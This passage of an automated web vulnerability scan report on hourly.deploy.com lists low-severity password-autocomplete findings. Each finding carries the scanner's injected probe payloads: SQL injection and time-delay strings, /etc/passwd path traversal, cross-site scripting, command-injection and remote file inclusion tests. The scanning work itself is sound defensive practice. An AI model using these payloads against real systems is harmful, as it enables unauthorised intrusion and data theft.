GET /hmc/report/?register=%3c%25+response.write(268409241-22)+%25%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.38. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=response.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=response.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.39. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.40. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select+sleep(25))a--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+sleep(25))a--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.41. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-1+OR+1%3d1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+1%3d1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.42. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.43. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000007%2529%253C%252Fscript%253E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:37 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%2527%2522--%253e%253c%252fstyle%253e%253c%252fscript%253e%253cscript%253enetsparker%25280x000007%2529%253c%252fscript%253e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.44. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1NS_NO HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1NS_NO" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.45. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=//www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=//www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.46. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.47. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.48. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%26expr%20268409241%20-%202%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.49. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.50. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.51. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=php://filter//resource=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.52. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.53. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.54. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
